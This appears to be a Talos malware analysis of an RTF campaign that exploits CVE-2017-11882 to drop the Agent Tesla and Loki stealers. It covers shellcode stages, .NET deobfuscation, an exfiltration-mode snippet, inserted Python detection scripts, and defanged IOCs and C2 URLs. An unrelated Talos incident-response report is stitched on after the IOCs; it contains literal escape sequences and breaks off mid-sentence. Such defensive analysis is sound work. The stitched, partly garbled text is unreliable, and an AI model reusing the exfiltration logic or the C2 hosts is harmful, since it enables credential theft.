In the case of Agent Tesla, the downloaded file was an RTF file with the SHA256 hash _cf193637626e85b34a7ccaed9e4459b75605af46cedc95325583b879990e0e61_. At the time the file was analyzed, it had almost no detections on the multi-engine antivirus scanning website VirusTotal. Only two out of 58 antivirus programs found anything suspicious. The programs that flagged this sample were only warning about a wrongly formatted RTF file. AhnLab-V3 marked it for "_RTF/Malform-A.Gen,_" while Zoner said it was likely flagged for "_RTFBadVersion._"

However, Cisco's Threat Grid painted a different picture, and identified the file as malware.

[Figure 2 - ThreatGrid Behavior Indicators (BI)](<https://4.bp.blogspot.com/-AdU3QUF6Js4/W8BA_uspvGI/AAAAAAAABGs/XU0vYsypV8MyWfMQOBwSWmxrATBzNCkAwCLcBGAs/s1600/image9.jpg>)

Figure 2 above shows just a subset of the triggered behaviour indicators (BI), and the part of the process tree below shows the highly suspicious execution chain.

[Figure 3 - ThreatGrid process tree](<https://2.bp.blogspot.com/-LeFQOuQ_ya4/W8BBK47xBXI/AAAAAAAABGw/6BDGYoJ_bo02kBYvHiDTxP1JUIdtZcXTgCLcBGAs/s1600/image22.jpg>)

In figure 3, we can see that _Winword.exe_ starts, and a bit later, a _svchost_ process executes the Microsoft Equation Editor (_EQNEDT32.exe_), which starts a process called "_scvhost.exe_". Equation Editor is a tool that Microsoft Office uses as a helper application to embed mathematical equations into documents. Word, for example, uses OLE/COM functions to start the Equation Editor, which matches what we see in figure 3. It's pretty uncommon for the Equation Editor application to start other executables, like the executable shown in figure 3. Not to mention that an executable using a name so similar to the system file "svchost.exe" is suspicious on its own. A user could easily miss the fact that the file name is barely changed.

The Threat Grid process timeline below confirms that this file is behaving like typical malware.

[Figure 4 - ThreatGrid process timeline](<https://4.bp.blogspot.com/-XIN650TNc_Y/W8BBVA6ih-I/AAAAAAAABG4/1Q7JO2yJAzwokrBVjPfgCUe9EEpu6vHaACLcBGAs/s1600/image18.jpg>)

You can see in figure 4 at points 1 and 2 that the Equation Editor downloaded a file called "_xyz[1].123_" and then created the _scvhost.exe_ process, which created another instance [_scvhost.exe(26)_] of itself a bit later (blue rectangle). Typical command and control (C2) traffic follows at point 4. At this point, we were sure that this is malware. The question was — why isn't it detected by any antivirus systems? And how does it manage to fly under the radar?

#### The malicious RTF file

The [RTF standard](<https://en.wikipedia.org/wiki/Rich_Text_Format>) is a proprietary document file format developed by Microsoft as a cross-platform document interchange. A simplified, standard RTF file looks like what you can see in figure 4.
It is built out of text and control words (strings). The upper portion is the source code and the lower shows how this file is displayed in Microsoft Word.

[Figure 5 - Simple RTF document](<https://3.bp.blogspot.com/-hRZSOhjK_QI/W8BBnhJ_wSI/AAAAAAAABHE/if4_SiMzATofK-0VJPrnErvDWBEJB8-pACLcBGAs/s1600/image11.jpg>)

RTF files do not support any macro language, but they do support Microsoft Object Linking and Embedding (OLE) objects and Macintosh Edition Manager subscriber objects via the '_\object_' control word. The user can link or embed an object from the same or a different format into the RTF document. For example, the user can embed a mathematical equation formula, created by the Microsoft Equation Editor, into the RTF document. Simplified, it would be stored in the object's data as a hexadecimal data stream. If the user opens this RTF file with Word, it hands over the object data to the Equation Editor application via OLE functions and gets the data back in a format that Word can display. In other words, the equation is displayed as being embedded in the document, even if Word could not handle it without the external application. This is pretty much what the file "_3027748749.rtf_" is doing. The only difference is, it is adding a lot of obfuscation, as you can see in figure 6. The big disadvantage of the RTF standard is that it comes with so many control words, and common RTF parsers are supposed to ignore anything they don't know. Therefore, adversaries have plenty of options to [obfuscate](<https://www.decalage.info/rtf_tricks>) the content of the RTF files.

[Figure 6 - 3027748749.rtf](<https://3.bp.blogspot.com/-8urxEcUMqcE/W8BByV41d8I/AAAAAAAABHI/2AuyOyKN65UbGg7vNmh-uw1uOWKtFf11ACLcBGAs/s1600/image17.jpg>)

We were able to use the rtfdump/rtfobj tools to verify the structure and extract the actual object data payload, despite the fact that the RTF file was heavily obfuscated. Figure 8 shows that the file tries to start the Microsoft Equation Editor (class name: _EQuATioN.3_).

[Figure 7 - rtfdump](<https://2.bp.blogspot.com/-IuTRucql3y0/W8BB3_Vg4AI/AAAAAAAABHQ/9Z851oIRZo8zEFgUWvaLrl7dhb3mmR6zwCLcBGAs/s1600/image12.jpg>)

[Figure 8 - rtfobj](<https://2.bp.blogspot.com/-NAyFkiKdVo0/W8BB9aZiUWI/AAAAAAAABHU/ClHt29o6Nl8oaUvZYZOgetp8aAdhKk1CQCLcBGAs/s1600/image15.jpg>)

In figure 6, you can also see that the adversaries are using the _\objupdate_ trick. This [forces](<http://latex2rtf.sourceforge.net/rtfspec_7.html>) the embedded object to update before it's displayed. In other words, the user does not have to click on the object before it's loaded, which would be the case for "normal" objects. Because the file forces the object to open, the exploit starts right away.

Let's have a look at the _objdata_ content from above, converted to a hexadecimal binary stream. More header details can be found [here](<https://msdn.microsoft.com/en-us/library/dd942076.aspx>).

[Figure 9 - Headers](<https://2.bp.blogspot.com/-TomP_Us90PA/W8BCCb3CtgI/AAAAAAAABHc/imgooVloC9082dzE_wxc5Zwk-zhaBMHcQCLcBGAs/s1600/image8.jpg>)

We can find a similar [MTEF Header](<http://rtf2latex2e.sourceforge.net/MTEF3.html>) like the one described in the FormBook post, but to avoid detection, the adversaries have changed the header's values. The only difference is that, except in the MTEF version field, the actors have filled the header fields with random values. The MTEF version field needs to be 2 or 3 to make the exploit work.
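The object handling described above, as an added triage script that is not part of the Talos post and not rtfobj's or rtfdump's code: it walks the `\objdata` group the way a lenient RTF reader would, dropping control words it does not know and all whitespace, decodes the remaining hex stream, reads the OLE1 header to recover the embedded class name, and flags a document that combines `\objupdate` with an Equation Editor class. The two RTF documents inside it are constructed for this example, and `extract_group`, `hex_payload`, `ole_header_of` and `triage_rtf` are names chosen here.

```python
import binascii
import re

# Constructed sample RTF (not from the Talos post): an embedded OLE object whose
# class name is "EQuATioN.3", the \objupdate control word, and junk control words
# plus whitespace scattered through the hex stream, mimicking the obfuscation the
# post describes (RTF parsers are expected to ignore control words they don't know).
SAMPLE_RTF = (
    r"{\rtf1\ansi\deff0 Some innocent text. "
    r"{\object\objemb\objupdate\objw1440\objh720{\*\objclass EQuATioN.3}"
    r"{\*\objdata 0105\junk1 0000 02\foo 000000 0b00\bar2 0000 "
    r"4551\baz 7541 5469 6f4e 2e33 00}}}"
)

# A benign document with no embedded object, for comparison (also constructed).
BENIGN_RTF = r"{\rtf1\ansi\deff0 Hello, world.}"

CONTROL_WORD_RE = re.compile(r"\\[A-Za-z]+-?\d*\s?")  # \word, \word12, \word-5 plus one delimiter
CONTROL_SYMBOL_RE = re.compile(r"\\.")                  # \*, \{, \} and other one-character symbols


def extract_group(rtf: str, start: int) -> str:
    """Return the text from `start` up to the brace that closes the current group."""
    depth, i = 1, start
    while i < len(rtf) and depth > 0:
        c = rtf[i]
        if c == "\\":          # skip control words / escaped braces so they don't affect depth
            i += 2
            continue
        if c == "{":
            depth += 1
        elif c == "}":
            depth -= 1
        i += 1
    return rtf[start:i - 1]


def hex_payload(objdata_text: str) -> bytes:
    """Decode an \\objdata hex stream as a lenient reader would: drop unknown control
    words and control symbols, ignore everything that is not a hex digit, unhexlify."""
    cleaned = CONTROL_WORD_RE.sub("", objdata_text)
    cleaned = CONTROL_SYMBOL_RE.sub("", cleaned)
    digits = re.sub(r"[^0-9A-Fa-f]", "", cleaned)
    return binascii.unhexlify(digits[: len(digits) - len(digits) % 2])


def ole_header_of(rtf: str):
    """Parse the start of the OLE1 object stream: (version, format id, class name),
    or None when the document carries no \\objdata group."""
    m = re.search(r"\\objdata\b", rtf)
    if not m:
        return None
    data = hex_payload(extract_group(rtf, m.end()))
    if len(data) < 12:
        return None
    version = int.from_bytes(data[0:4], "little")
    format_id = int.from_bytes(data[4:8], "little")      # 2 = embedded object
    name_len = int.from_bytes(data[8:12], "little")      # length includes the NUL terminator
    class_name = data[12:12 + name_len].rstrip(b"\x00").decode("ascii", "replace")
    return version, format_id, class_name


def triage_rtf(rtf: str) -> dict:
    """Flag RTF files that embed an Equation Editor object and force it to load."""
    header = ole_header_of(rtf)
    class_name = header[2] if header else None
    # Case-insensitive on purpose: the sample in the post spells it "EQuATioN.3".
    forced_equation = "\\objupdate" in rtf and (class_name or "").lower().startswith("equation")
    return {
        "has_object": "\\object" in rtf,
        "objupdate": "\\objupdate" in rtf,
        "class_name": class_name,
        "suspicious": forced_equation,
    }


if __name__ == "__main__":
    print(triage_rtf(SAMPLE_RTF))
    print(triage_rtf(BENIGN_RTF))
```

The brace walk and the control-word stripping are the parts that matter: a detector that only regex-matches a clean `\objdata` hex run misses exactly the junk-laden streams the post shows, whereas a reader that ignores unknown control words sees the same bytes Word hands to the Equation Editor.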
[Figure 10 - MTEF V2 header](<https://1.bp.blogspot.com/-wdCoA-CMwNk/W8BCHlTJL5I/AAAAAAAABHg/CRbl37wsZE0y5U9UocpKquCqU_7Jg5d8gCLcBGAs/s1600/image13.jpg>)

After the MTEF header, we have an unknown MTEF byte stream tag of two bytes (F1 01) followed by a _Font Tag (08 E0 7B …)_. The bytes following the Font Tag (B9 C3 …) do not look like a normal font name, so this is a good indicator that we are looking at an exploit. The bytes do look very different to what we have seen in our research mentioned previously, but let's decode them.

[Figure 11 - Shellcode - new campaign.](<https://1.bp.blogspot.com/-wf-KqIAw0s8/W8BCMU1plEI/AAAAAAAABHk/5YIWLXtDuncpAlx8chqMJthkDqwm6W3dQCLcBGAs/s1600/image7.jpg>)

This looks pretty similar to what we have seen before. In figure 12, you can see the decoded shellcode from our previous research.

[Figure 12 - Shellcode - former campaign.](<https://4.bp.blogspot.com/-6JYpgmfLDx0/W8BCRMyfRbI/AAAAAAAABHs/A-Oq-eq7NqAgp6nWnK-5ZvccGtN0MttMgCLcBGAs/s1600/image27.jpg>)

The adversaries have just changed registers and some other minor parts. At this point, we are already pretty sure that this is CVE-2017-11882, but let's prove this.

#### PyREBox rock 'n' roll

In order to verify that the malicious RTF file is exploiting CVE-2017-11882, we used PyREBox, a dynamic analysis engine developed by Talos. This tool allows us to instrument the execution of a complete system and monitor different events, such as instruction execution, memory reads and writes, and operating system events, and also provides interactive analysis capabilities that allow us to inspect the state of the emulated system at any time. For additional information about the tool, please refer to the [blog posts](<https://blog.talosintelligence.com/2018/04/malware-monitor-pyrebox-for-analysis.html>) about its release and the [malware monitoring scripts](<https://github.com/Cisco-Talos/pyrebox/tree/master/mw_monitor>) [presented](<https://github.com/Cisco-Talos/pyrebox/tree/master/docs/pyrebox_hitb_ams.pdf>) at the Hack in the Box 2018 conference.

For this analysis, we leveraged the shadow stack plugin, which was released together with other exploit analysis scripts (shellcode detection and stack pivoting detection) at [EuskalHack](<https://securitycongress.euskalhack.org/>) Security Congress III earlier this year ([slides available](<https://github.com/Cisco-Talos/pyrebox/tree/master/docs/pyrebox_euskalhack.pdf>)). This script monitors all the CALL and RET instructions executed under the context of a given process (in this case, the Equation Editor process), and maintains a shadow stack that keeps track of all the valid return addresses (those that follow every executed CALL instruction).

The only thing we need to do is configure the plugin to monitor the Equation Editor process (the plugin will wait for it to be created), and open the RTF document inside the emulated guest. PyREBox will stop the execution of the system whenever a RET instruction jumps into an address that is not preceded by a CALL instruction. This approach allows us to detect the exploitation of stack overflow bugs that overwrite the return address stored on the stack. Once the execution is stopped, PyREBox spawns an interactive IPython shell that allows us to inspect the system and debug and/or trace the execution of the Equation Editor process.

[Figure 13 - PyREBox stops the execution the moment it detects the first return to an invalid address: 0x44fd22.](<https://4.bp.blogspot.com/-n5aDd19Wu0c/W8BCWq--HWI/AAAAAAAABH0/HfE4m36Q9nYJyq7UZ9UOemc1uX4g_9SxACLcBGAs/s1600/image1.jpg>)
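The shadow stack check the plugin performs, as an added simulation over a constructed CALL/RET trace; this is not PyREBox code, and `Event`, `ShadowStack` and `scan_trace` are names chosen for this example. Every CALL pushes the address of the instruction after it, and a RET that pops anything else is reported. The RET address 0x411874 and the overwritten return target 0x44fd22 are the values quoted in the post; the other addresses in the trace are constructed.

```python
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed instruction trace (not PyREBox output) modelling what the post
# describes: the plugin sees every CALL and RET in the monitored process, pushes
# the return address that follows each CALL, and stops the guest when a RET pops
# an address that no CALL produced.


@dataclass
class Event:
    kind: str        # "call" or "ret"
    addr: int        # address of the CALL/RET instruction itself
    size: int = 0    # instruction length, so a CALL's return address is addr + size
    target: int = 0  # for RET: the address actually popped from the stack


class ShadowStack:
    """Tracks the return addresses a well-behaved program is allowed to use."""

    def __init__(self) -> None:
        self.frames: List[int] = []

    def on_call(self, ev: Event) -> None:
        self.frames.append(ev.addr + ev.size)

    def on_ret(self, ev: Event) -> Optional[str]:
        if not self.frames:
            return "ret_without_call"
        if ev.target in self.frames:
            # Unwind to the matching frame: tolerates longjmp / exception unwinding,
            # which legitimately skips intermediate frames.
            idx = len(self.frames) - 1 - self.frames[::-1].index(ev.target)
            del self.frames[idx:]
            return None
        self.frames.pop()  # the frame is consumed either way
        return "ret_to_invalid_address"


def scan_trace(events: List[Event]) -> List[Tuple[int, str, int]]:
    """Return (ret_instruction_addr, reason, popped_target) for every violation."""
    shadow, alerts = ShadowStack(), []
    for ev in events:
        if ev.kind == "call":
            shadow.on_call(ev)
        elif ev.kind == "ret":
            reason = shadow.on_ret(ev)
            if reason:
                alerts.append((ev.addr, reason, ev.target))
    return alerts


# 0x411874 and 0x44fd22 come from the post; the other addresses are constructed.
TRACE = [
    Event("call", 0x401000, 5),               # ordinary call ...
    Event("ret", 0x402010, target=0x401005),  # ... returning to the instruction after it
    Event("call", 0x4117F0, 5),               # call into the vulnerable function (constructed addr)
    Event("ret", 0x411874, target=0x44FD22),  # overwritten return address: first detection
    Event("ret", 0x44FD22, target=0x18F200),  # the gadget RET pops into the shellcode (constructed addr)
]

if __name__ == "__main__":
    for addr, reason, target in scan_trace(TRACE):
        print(f"RET at {addr:#x}: {reason} -> {target:#x}")
```

The second alert is what the post calls the plugin "detecting this situation again": once the corrupted frame is consumed, the RET at 0x44fd22 has no CALL behind it at all, so the mismatch shows up twice in a row.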
PyREBox will stop the execution on the return address at _0x00411874_, which belongs to the vulnerable function reported in CVE-2017-11882. In this case, the malware authors decided to leverage this vulnerability to overwrite the return address with an address contained in Equation Editor's main executable module: _0x0044fd22_. If we examine this address (see Figure 13), we see that it points to another RET instruction that will pop another address from the stack and jump into it. The shadow stack plugin detects this situation again, and stops the execution on the next step of the exploit.

[Figure 14 — First stage of the shellcode.](<https://2.bp.blogspot.com/-VlmeyCM3E38/W8BCbWgt2TI/AAAAAAAABH8/oF3Xfp9YF3IyUWPeznxFEFVF5_dd__ytQCLcBGAs/s1600/image5.jpg>)

Figure 14 shows the first stage of the shellcode, which is executed right after the second RET. This shellcode will call the GlobalLock function (_0x18f36e_) and afterward, will jump into a second buffer containing the second stage of the shellcode.

[Figure 15 - Start of the second stage of the shellcode.](<https://2.bp.blogspot.com/-R_FvoE_sbvk/W8BCfja_UlI/AAAAAAAABIE/r2NyOets62sZ_NP17_OF2HN3sBYPactFwCLcBGAs/s1600/image25.jpg>)

The second stage of the shellcode consists of a sequence of _jmp/call_ instructions followed by a decryption loop.

[Figure 16 - Decryption loop of the second stage of the shellcode.](<https://4.bp.blogspot.com/-YlKfQJkvM-Y/W8BCkSebikI/AAAAAAAABIM/MkCEs_txmroY6kExD0RjtznAP19Jw_KBgCLcBGAs/s1600/image19.jpg>)

This decryption loop will unpack the final payload of the shellcode, and finally jump into this decoded buffer. PyREBox allows us to dump the memory buffer containing the shellcode at any point during the execution. There are several ways to achieve this, but one possible way is to use the Volatility framework (which is available through the PyREBox shell) to list the VAD regions in the process and dump the buffer containing the interesting code. This buffer can then be imported into IDA Pro for a deeper analysis.

[Figure 17 — Decrypted buffer of the second stage (final stage of the shellcode).](<https://2.bp.blogspot.com/-wmjf8-n97_Y/W8BCp6-nzjI/AAAAAAAABIQ/uIvADLJnTcsUoe_MLk-vdaASy0kp3O9pACLcBGAs/s1600/image21.jpg>)

This final stage of the shellcode is quite straightforward. It leverages standard techniques to find the _kernel32.dll_ module in the linked list of loaded modules available in the PEB, and afterward, will parse its export table to locate the _LoadLibrary_ and _GetProcAddress_ functions. By using these functions, the shellcode resolves several API functions (_ExpandEnvironmentStrings_, _URLDownloadToFileA_, and _ShellExecute_) to download and execute the _xyz.123_ binary from the URL, which we have already seen in the Threat Grid analysis. The shellcode starts this executable with the name "_scvhost.exe_," which we have also seen before in the Threat Grid report.

We have also seen several other campaigns using the exact same infection chain, but delivering Loki as the final payload. We list these in the IOC sections.

#### Payload details

Let's look into the final payload file "_xyz.123_" (_a8ac66acd22d1e194a05c09a3dc3d98a78ebcc2914312cdd647bc209498564d8_) or "_scvhost.exe_" if you prefer the process name from above.

    $ file xyz123.exe
    xyz123.exe: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows

Loading the file into [dnSpy](<https://github.com/0xd4d/dnSpy>) — a .NET assembly editor, decompiler and debugger — confirms that it's a .NET executable that's heavily obfuscated.
[Figure 18 - xyz123.exe.](<https://2.bp.blogspot.com/-QEclaZoNCTo/W8BC0wcWJ_I/AAAAAAAABIc/TcEd0Os-4TwXEH1ZOr0LjPPTxC3Rvpk9wCLcBGAs/s1600/image10.jpg>)

The execution starts at the class constructor (cctor) executing the

    <Module>.ҭъЩӂӬҀУ\u0486\u0489їҒреӱҤЫѝйҹП()

method. It loads a large array into memory and decodes it. The rest of the cctor reconstructs a _xs.dll_ and other code from the array and proceeds at the entry point with additional routines. At the end, it jumps by calling the _P.M()_ method into the _xs.dll_.

[Figure 19 - P.M() method.](<https://2.bp.blogspot.com/-ZJW7ZuXEm1Q/W8BC7lhSbqI/AAAAAAAABIk/anPBxSiGEIcS0LZn-STyNvjh8GiEx8suwCLcBGAs/s1600/image3.jpg>)

This one is interesting because it presents a well-known artifact that shows that the assembly was obfuscated with the [Agile.Net obfuscator](<https://secureteam.net/acode-features-detailed>).

[Figure 20 - Agile.Net obfuscator artifact.](<https://2.bp.blogspot.com/-KGSOdxd3xwo/W8BC_hM4ZwI/AAAAAAAABIo/NZkq-OzRqegN4h4GDJBQ97gsFaZU9XUQgCLcBGAs/s1600/image14.jpg>)

Since there is no custom obfuscation, we can just execute the file, wait a while, and dump it via [Megadumper](<https://github.com/CodeCracker-Tools/MegaDumper>), a tool that dumps .NET executables directly from memory. This already looks much better.

[Figure 21 - Deobfuscated code step one.](<https://4.bp.blogspot.com/-BwOtG5nISrQ/W8BDEWtGviI/AAAAAAAABIs/ZA1HJPDevcgsecDWrTf5qaziMmN4_pdOACLcBGAs/s1600/image2.jpg>)

Unfortunately, the obfuscator has encrypted all strings with the H.G() method and we cannot see the content of those strings.

[Figure 22 - H.G() method](<https://1.bp.blogspot.com/-6ffzd31SuBw/W8BDJHG8EwI/AAAAAAAABI0/tNGwTJY5kjES9kV0AqNQtP2xnRJx06e-ACLcBGAs/s1600/image6.jpg>)

Luckily, the de4dot .NET deobfuscator tool kills this with one command. We just need to tell it which method in the sample is used to decrypt the strings at runtime. This is done by handing over the token of the corresponding method, in this case, _0x06000001_. De4dot has an issue with auto-detecting the Agile .NET obfuscator, so we have to hand over this function via the '-p' option.

[Figure 23 - de4dot .NET deobfuscator.](<https://1.bp.blogspot.com/-Y4iL1AL-I9I/W8BDOQwHg8I/AAAAAAAABI8/NMx7LTkIchQ0pMlCr6xSmUCWMzai0FUeACLcBGAs/s1600/image20.jpg>)

Even if it looks like the operation failed, it has successfully replaced all obfuscated strings and recovered them, as we can see below.

[Figure 24 - Decoded strings.](<https://4.bp.blogspot.com/-WF2WPbXz8DQ/W8BDT2VEZ_I/AAAAAAAABJE/o4GyE8mvU0QKb5LiYSPh_QkTV_2leu8igCLcBGAs/s1600/image16.jpg>)

Examining the source code shows us that the adversaries are using an information stealer/RAT sold by a company selling grayware products: [Agent Tesla](<https://www.agenttesla.com/>). Agent Tesla contains a number of questionable functions, such as password stealing, screen capturing and the ability to download additional malware. However, the sellers of this product say that it is used for password recovery and child monitoring.

[Figure 25 - Sample of password stealing methods.](<https://4.bp.blogspot.com/-zTrWTm6VAy8/W8BDboHnAnI/AAAAAAAABJQ/OfsXCyhG6Rw38nIPxF0HrycQjfMk_YTBQCLcBGAs/s1600/image28.jpg>)

The malware comes with password-stealing routines for more than 25 common applications and other rootkit functions such as keylogging, clipboard stealing, screenshots and webcam access.
Passwords are stolen from the following applications, among others:

* Chrome
* Firefox
* Internet Explorer
* Yandex
* Opera
* Outlook
* Thunderbird
* IncrediMail
* Eudora
* FileZilla
* WinSCP
* FTP Navigator
* Paltalk
* Internet Download Manager
* JDownloader
* Apple keychain
* SeaMonkey
* Comodo Dragon
* Flock
* DynDNS

This version comes with routines for SMTP, FTP and HTTP exfiltration, but is using only the HTTP POST one, which you can see in figure 26 below. The decision as to which exfiltration method is used is hardcoded in a variable stored in the configuration, which is checked in almost all methods like this:

    if (Operators.CompareString(_P.Exfil, "webpanel", false) == 0)
    ...
    else if (Operators.CompareString(_P.Exfil, "smtp", false) == 0)
    ...
    else if (Operators.CompareString(_P.Exfil, "ftp", false) == 0)

[Figure 26 - HTTP exfiltration routine.](<https://2.bp.blogspot.com/-T9HdQCnJUZQ/W8BDhAbrD_I/AAAAAAAABJU/7YEmwrRiK6QfG30pCwlFINoci7b5YiYWQCLcBGAs/s1600/image24.jpg>)

For example, it creates the POST request string, as you can see below in figure 27.

[Figure 27 - POST request.](<https://4.bp.blogspot.com/-Pj4IeEedwZo/W8BDn97V6zI/AAAAAAAABJc/W3ATPS-lm24DVVukEnIk_QcAeoQ9--iEgCLcBGAs/s1600/image26.jpg>)

Then, it encrypts it with 3DES before sending it (figure 28). The _P.Y("0295A...1618C")_ method in figure 26 creates the MD5 hash of the string. This hash is used as the secret for the 3DES encryption.

[Figure 28 - 3DES Encryption method](<https://3.bp.blogspot.com/-US3FVkl4HyY/W8BD5sEkUgI/AAAAAAAABJs/P5CbK9M-DwIAy2RwkXw1m59pDcaLKdKjwCLcBGAs/s1600/image23.jpg>)

#### Conclusion

This is a highly effective malware campaign that is able to avoid detection by most antivirus applications. Therefore, it is necessary to have additional tools such as Threat Grid to defend your organization from these kinds of threats.

The actor behind this malware used the RTF standard because of its complexity, and used a modified exploit of a Microsoft Office vulnerability to download Agent Tesla and other malware. It is not completely clear if the actor changed the exploit manually, or if they used a tool to produce the shellcode. Either way, this shows that the actor or their tools have the ability to modify the assembler code in such a way that the resulting opcode bytes look completely different, but still exploit the same vulnerability. This is a technique that could very well be used to deploy other malware in a stealthy way in the future.

#### IOC

**Maldocs**

cf193637626e85b34a7ccaed9e4459b75605af46cedc95325583b879990e0e61 - 3027748749.rtf
A8ac66acd22d1e194a05c09a3dc3d98a78ebcc2914312cdd647bc209498564d8 - xyz.123
38fa057674b5577e33cee537a0add3e4e26f83bc0806ace1d1021d5d110c8bb2 - Proforma_Invoice_AMC18.docx
4fa7299ba750e4db0a18001679b4a23abb210d4d8e6faf05ce2cbe2586aff23f - Proforma_Invoice_AMC19.docx
1dd34c9e89e5ce7a3740eedf05e74ef9aad1cd6ce7206365f5de78a150aa9398 - HSBC8117695310_doc

**Distribution Domains**

avast[.]dongguanmolds[.]com
avast[.]aandagroupbd[.]website

**Loki related samples from hxxp://avast[.]dongguanmolds[.]com**

a8ac66acd22d1e194a05c09a3dc3d98a78ebcc2914312cdd647bc209498564d8 - xyz.123
5efab642326ea8f738fe1ea3ae129921ecb302ecce81237c44bf7266bc178bff - xyz.123
55607c427c329612e4a3407fca35483b949fc3647f60d083389996d533a77bc7 - xyz.123
992e8aca9966c1d42ff66ecabacde5299566e74ecb9d146c746acc39454af9ae - xyz.123
1dd34c9e89e5ce7a3740eedf05e74ef9aad1cd6ce7206365f5de78a150aa9398 - HSBC8117695310.doc
d9f1d308addfdebaa7183ca180019075c04cd51a96b1693a4ebf6ce98aadf678 - plugin.wbk

**Loki related URLs:**

hxxp://46[.]166[.]133[.]164/0x22/fre.php
hxxp://alphastand[.]top/alien/fre.php
hxxp://alphastand[.]trade/alien/fre.php
hxxp://alphastand[.]win/alien/fre.php
hxxp://kbfvzoboss[.]bid/alien/fre.php
hxxp://logs[.]biznetviigator[.]com/0x22/fre.php

**Other related samples**

1dd34c9e89e5ce7a3740eedf05e74ef9aad1cd6ce7206365f5de78a150aa9398
7c9f8316e52edf16dde86083ee978a929f4c94e3e055eeaef0ad4edc03f4a625
8b779294705a84a34938de7b8041f42b92c2d9bcc6134e5efed567295f57baf9
996c88f99575ab5d784ad3b9fa3fcc75c7450ea4f9de582ce9c7b3d147f7c6d5
dcab4a46f6e62cfaad2b8e7b9d1d8964caaadeca15790c6e19b9a18bc3996e18

Source: Talos blog post "Old dog, new tricks - Analysing new RTF-based campaign distributing Agent Tesla, Loki with PyREbox", published 2018-10-15 (modified 2018-10-16), CVEs: CVE-2017-0199, CVE-2017-11882, CVSS 9.3 (AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE), id TALOSBLOG:7F660B8BF6BF1461DC91FBA38C034D9A, http://feedproxy.google.com/~r/feedburner/Talos/~3/NV2-ZeRVf-Q/old-dog-new-tricks-analysing-new-rtf_15.html

Talos Incident Response quarterly trends blog post (record last seen 2022-10-25):

### Ransomware and pre-ransomware engagements make up 40 percent of threats seen this quarter

_By Caitlin Huey._

For the first time since compiling these reports, Cisco Talos Incident Response saw an equal number of ransomware and pre-ransomware engagements, making up nearly 40 percent of threats this quarter.

It can be difficult to determine what constitutes a pre-ransomware attack if ransomware never executes and encryption does not take place.
However, Talos IR assesses that the [combination of Cobalt Strike](<https://talos-intelligence-site.s3.amazonaws.com/production/document_files/files/000/095/031/original/Talos_Cobalt_Strike.pdf>) and credential-harvesting tools like Mimikatz, paired with enumeration and discovery techniques, indicates a high likelihood that ransomware is the final objective.

[Related Talos resource](<https://talosintelligence.com/resources/543>)

This quarter featured a variety of publicly available tools and scripts hosted on GitHub repositories or other third-party websites to support operations across multiple stages of the attack lifecycle. This activity coincides with a general increase in the use of other dual-use tools, such as the legitimate red-teaming tool Brute Ratel and the recently discovered [Manjusaka](<https://blog.talosintelligence.com/2022/08/manjusaka-offensive-framework.html>) and [Alchimist](<https://blog.talosintelligence.com/2022/10/alchimist-offensive-framework.html>) attack frameworks.

[Top threats chart](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgs8-vXMLleDlwAs0W5Ju_9cgoE8Rkzh4are8Oc0aNazxuObHTOVO5Fevq75Tlixl49DdoHZbCrFNJcK_7HzpCqcI-l86s1976bm7-nj1WNBWOL0dX-C_5OMmHgBUHU-zipY7JviFNMK1ucbERQ77lm8R9lsz5xqpTGRYD5RP1pBVFEVPp49aMkP0T/s2001/TopThreats-dark(1).jpg>)

## Targeting

Attackers targeted the education sector the most of any vertical this quarter, closely followed by the financial services, government, and energy sectors, respectively. For the first time since Q4 2021, telecommunications was not the top-targeted vertical. While the reason for the education sector being more frequently targeted this quarter is unknown, this is a popular time of year for adversaries to target education institutions as students and teachers return to school.

[Targeting chart](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7HEE12kQoDh7FeGzIEdlORUOZwLrsxkkdvftktGAL6Vvom8-qABOruW0Qg7b6g8qfY6P92DmswJwQb2HZnZ3EW95adUFucIOGAtcrE165TgbbIaW16fi9q0XVf7nUrtU4tUuPJ02Dw_zVheTctwbThjUZ8D4oDm01RsK8LDWHjjw1LRtDeiAf4sen/s2001/Target-dark(1).jpg>)

## Ransomware

We observed two previously seen high-profile ransomware families, Vice Society and [Hive](<https://blog.talosintelligence.com/2022/05/conti-and-hive-ransomware-operations.html>). This quarter also saw a ransomware family that had yet to be observed in IR engagements, Black Basta, which first emerged in April 2022.

Talos IR responded to a Vice Society ransomware engagement affecting an education institution in Austria, part of an ongoing trend of Vice Society actors disproportionately targeting the education sector, which is consistent with [U.S. Cybersecurity and Infrastructure Security Agency (CISA) reporting](<https://www.cisa.gov/uscert/ncas/alerts/aa22-249a>). Analysis of the event logs revealed numerous outbound remote desktop protocol (RDP) connection attempts from an infected host to other systems, indicating the adversary moved laterally. Further analysis identified indicators for the remote access software AnyDesk and TeamViewer, where over 50 systems were observed reaching out to TeamViewer-related URLs. An exception was also added to the Windows Defender firewall exemption list for “AnyDesk.exe” executions by the SYSTEM account. The likely trigger for ransomware was PsExec execution followed by deployment of ransomware, which was written to the Windows Roaming profile of the compromised user.
\n\nIn recent months, Talos observed [ongoing Qakbot](<https://blog.talosintelligence.com/2022/07/quarterly-report-incident-response.html>) activity leveraging [thread hijacking](<https://blog.talosintelligence.com/2022/07/what-talos-incident-response-learned.html>) and password-protected ZIP files to enhance legitimacy. For example, in a ransomware engagement affecting a U.S.-based IT company, Talos IR observed multiple IP addresses associated with command and control (C2) traffic to/from compromised endpoints associated with Qakbot. The attackers likely gained initial access via a phishing email with an HTML attachment that, once opened, initiated JavaScript that subsequently downloaded a malicious password-protected ZIP file. The ZIP file contained a Windows shortcut file (LNK) that, once downloaded and executed on the victim system, delivers Qakbot. The adversaries eventually dropped the ransomware Black Basta, which we had not previously observed in Talos IR engagements. In the past six months, we\u2019ve seen Qakbot use several different infection chains, including potentially moving away from LNK files in some campaigns.\n\nTalos has been monitoring the disclosure of \u201cLockBit Black,\u201d the builder for the [LockBit 3.0 ransomware encryptor](<https://www.buzzsprout.com/2018149/11457844>), leaked publicly in late September 2022 by an alleged LockBit coder/developer. This leak is among many setbacks this group has experienced in recent months, including[ distributed denial-of-service (DDoS) attacks](<https://blog.talosintelligence.com/2022/09/ransomware-leaksite-ddos.html>) targeting the group\u2019s data leaks site. While Talos IR did not observe any LockBit ransomware engagements this quarter, the builder could make attribution more difficult involving typical LockBit tactics, techniques, and procedures (TTPs) as more threat actors incorporate the 